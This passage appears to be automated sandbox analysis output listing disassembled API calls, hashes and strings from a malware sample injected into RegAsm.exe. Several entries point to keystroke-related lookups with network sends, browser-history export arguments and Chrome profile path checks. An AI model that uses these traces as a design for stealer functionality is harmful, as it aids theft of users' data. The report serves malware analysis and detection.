                      • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                      • String ID:
                      • API String ID: 2180151492-0
                      • Opcode ID: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
                      • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                      • Opcode Fuzzy Hash: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
                      • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                      • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                      • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                      • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                      • __alloca_probe_16.LIBCMT ref: 004511B1
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                      • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                      • __freea.LIBCMT ref: 0045121D
                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                      • String ID:
                      • API String ID: 313313983-0
                      • Opcode ID: 176232f54f3ec98bfb029651777c0c6490447229ae5715771154ed3ce12be0f5
                      • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                      • Opcode Fuzzy Hash: 176232f54f3ec98bfb029651777c0c6490447229ae5715771154ed3ce12be0f5
                      • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                      • _free.LIBCMT ref: 0044F3BF
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                      • String ID:
                      • API String ID: 336800556-0
                      • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                      • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                      • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                      • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                      • _free.LIBCMT ref: 100071B8
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                      • String ID:
                      • API String ID: 336800556-0
                      • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                      • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                      • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                      • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                      APIs
                      • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                      • _free.LIBCMT ref: 004482D3
                      • _free.LIBCMT ref: 004482FA
                      • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                      • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$_free
                      • String ID:
                      • API String ID: 3170660625-0
                      • Opcode ID: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                      • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                      • Opcode Fuzzy Hash: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                      • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                      APIs
                      • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                      • _free.LIBCMT ref: 10005BB4
                      • _free.LIBCMT ref: 10005BDB
                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: ErrorLast$_free
                      • String ID:
                      • API String ID: 3170660625-0
                      • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                      • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                      • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                      • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                      APIs
                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                      • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$CloseHandleOpen$FileImageName
                      • String ID:
                      • API String ID: 2951400881-0
                      • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                      • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                      • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                      • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                      • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                      • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: lstrlen$lstrcat
                      • String ID:
                      • API String ID: 493641738-0
                      • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                      • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                      • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                      • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                      APIs
                      • _free.LIBCMT ref: 004509D4
                        • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                      • _free.LIBCMT ref: 004509E6
                      • _free.LIBCMT ref: 004509F8
                      • _free.LIBCMT ref: 00450A0A
                      • _free.LIBCMT ref: 00450A1C
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                      • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                      • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                      • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                      APIs
                      • _free.LIBCMT ref: 100091D0
                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                      • _free.LIBCMT ref: 100091E2
                      • _free.LIBCMT ref: 100091F4
                      • _free.LIBCMT ref: 10009206
                      • _free.LIBCMT ref: 10009218
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                      • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                      • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                      • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                      APIs
                      • _free.LIBCMT ref: 00444066
                        • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                      • _free.LIBCMT ref: 00444078
                      • _free.LIBCMT ref: 0044408B
                      • _free.LIBCMT ref: 0044409C
                      • _free.LIBCMT ref: 004440AD
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                      • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                      • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                      • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                      APIs
                      • _free.LIBCMT ref: 1000536F
                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                      • _free.LIBCMT ref: 10005381
                      • _free.LIBCMT ref: 10005394
                      • _free.LIBCMT ref: 100053A5
                      • _free.LIBCMT ref: 100053B6
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                      • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                      • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                      • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                      APIs
                      • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                        • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00F86D08,00000010), ref: 004048E0
                        • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFileKeyboardLayoutNameconnectsend
                      • String ID: XQG$NG$PG
                      • API String ID: 1634807452-3565412412
                      • Opcode ID: 9cefce376da0e5a625bd0361d63876b75821adb98292e5a76fa33c4dbf6a1e63
                      • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                      • Opcode Fuzzy Hash: 9cefce376da0e5a625bd0361d63876b75821adb98292e5a76fa33c4dbf6a1e63
                      • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: `#D$`#D
                      • API String ID: 885266447-2450397995
                      • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                      • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                      • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                      • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                      • _free.LIBCMT ref: 00443540
                      • _free.LIBCMT ref: 0044354A
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free$FileModuleName
                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      • API String ID: 2506810119-1068371695
                      • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                      • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                      • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                      • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                      • _free.LIBCMT ref: 10004CE8
                      • _free.LIBCMT ref: 10004CF2
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: _free$FileModuleName
                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      • API String ID: 2506810119-1068371695
                      • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                      • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                      • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                      • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                      APIs
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 100099A8
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100099D6
                      • GetLastError.KERNEL32 ref: 10009A07
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: ByteCharErrorFileLastMultiWideWrite
                      • String ID: 6/
                      • API String ID: 2456169464-4212659297
                      • Opcode ID: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
                      • Instruction ID: 4dca0cb6e5ae08cfaecef52c11f05f5c50a0db4386d341a895ff8b0f45518e07
                      • Opcode Fuzzy Hash: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
                      • Instruction Fuzzy Hash: 7D314375A002199FEB14CF69CC95AEAB7B9EF48344F0144ADE50AD7254D730AD81CB61
                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                        • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,6CB58300,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                        • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                        • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                      • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                      • String ID: /sort "Visit Time" /stext "$0NG
                      • API String ID: 368326130-3219657780
                      • Opcode ID: 29552263b8b9376c47bea13a29c855a9b9fb7bf60d29f163f34010b0b3316dc7
                      • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                      • Opcode Fuzzy Hash: 29552263b8b9376c47bea13a29c855a9b9fb7bf60d29f163f34010b0b3316dc7
                      • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                      APIs
                      • _wcslen.LIBCMT ref: 004162F5
                        • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                        • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                        • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                        • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wcslen$CloseCreateValue
                      • String ID: !D@$okmode$PG
                      • API String ID: 3411444782-3370592832
                      • Opcode ID: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                      • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                      • Opcode Fuzzy Hash: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                      • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                      APIs
                        • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
